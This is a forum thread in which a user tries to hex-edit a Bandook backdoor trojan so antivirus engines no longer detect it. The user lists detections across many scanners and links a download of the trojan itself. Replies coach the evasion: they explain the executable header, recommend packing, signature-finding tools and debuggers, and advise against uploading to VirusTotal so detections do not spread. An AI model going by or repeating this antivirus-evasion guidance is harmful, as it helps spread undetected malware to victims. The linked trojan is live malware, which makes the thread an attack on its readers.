Hex undetecting a trojan

[Ataraxia]

Hey guys, I just spent the last 2 hours trying to make this trojan undetectable by a few AV's. I got it to be undetected, but the program no longer runs (figures eh) The problem is part of the hex I edited.
[4D5A *000 0*00 0000 0400 0000 FFFF 0000]
Here is what happens if I leave the hex as it is...

Code:

A-Squared  	
Found nothing
AntiVir 	
Found HEUR/Malware
ArcaVir 	
Found nothing
Avast 	
Found nothing
AVG Antivirus 	
Found BackDoor.Bandok.B
BitDefender 	
Found Backdoor.Bandok.AV
ClamAV 	
Found Trojan.Bandok-7
CPsecure 	
Found BackDoor.W*2.Bandok.av
Dr.Web 	
Found BackDoor.Iam
F-Prot Antivirus 	
Found W*2/Warezov.gen*!W*2DL
F-Secure Anti-Virus 	
Found Backdoor.Win*2.Bandok.av
Fortinet 	
Found W*2/Bandok.AW!tr.bdr
Ikarus 	
Found Backdoor.Win*2.Bandok.av
Kaspersky Anti-Virus 	
Found Backdoor.Win*2.Bandok.av
NOD*2 	
Found probably a variant of Win*2/Bandok (probable variant)
Norman Virus Control 	
Found W*2/Bandok.gen*
Panda Antivirus 	
Found nothing
Rising Antivirus 	
Found Backdoor.Agent.hfl
Sophos Antivirus 	
Found Mal/Bandook-A
VirusBuster 	
Found Backdoor.Bandok.BE
VBA*2 	
Found BackDoor.Iam

and obviously when I removed the bolded part it becomes undetected by AV's

If you'd like to give a shot at it I'd be grateful. I don't plan on using this, I put a fake server just doing it for learning purposes.
Here is a link to the file as I currently have it in the 'undetected' state. Change the first line to the above to have it detected but runnable.

WARNING: The following download IS a trojan, although it doesn't work or install the server it is still a trojan. I'm giving you fair warning although I'd appreciate it if you helped... If you run it it'll install to
Windows/System*2/ali.exe
[URL="http://dodownload.filefront.com/*88**02//6d0856e622a*cd5c8*64d8027*c774*6afa2e8*b2bb*770*4bbc47c7*67*0*de07548d*0**6*4*4e"]Trojan[/URL]

[coz]

What you modified is the DOS stub of the .exe. So all executables have what you just modified. If you learn the basic executable file structure you would be able to modify the hex much more easily and with much less errors. The byte you changed is specifically an executable signature telling the OS (Windows), hey you need to execute this when opened.

You should not edit anything in any of the headers because that is what is used by Windows to execute the file. It has nothing to do with malware avoiding detection in most cases. Also you have to think if I were to create signatures for a virus database I would base the signature on things the virus/trojan cannot change or it will not run. So code needed to run the malware could be a signature and may not be able to be changed that's why most malware is packed in some way.

Anyway if you still interested in this try SignatureZero. It will help you a lot just google for it. You should also have a deb***er like Olly, IDA, W*2Dasm, etc., that way you can see if what your changing is important. Hope this info helps you.

[gordo]

Also, don 't test your server at jotti or virustotal. If it is detected by just one scanner, the detected strings are given to all of the others, and your server will be detected by all very soon.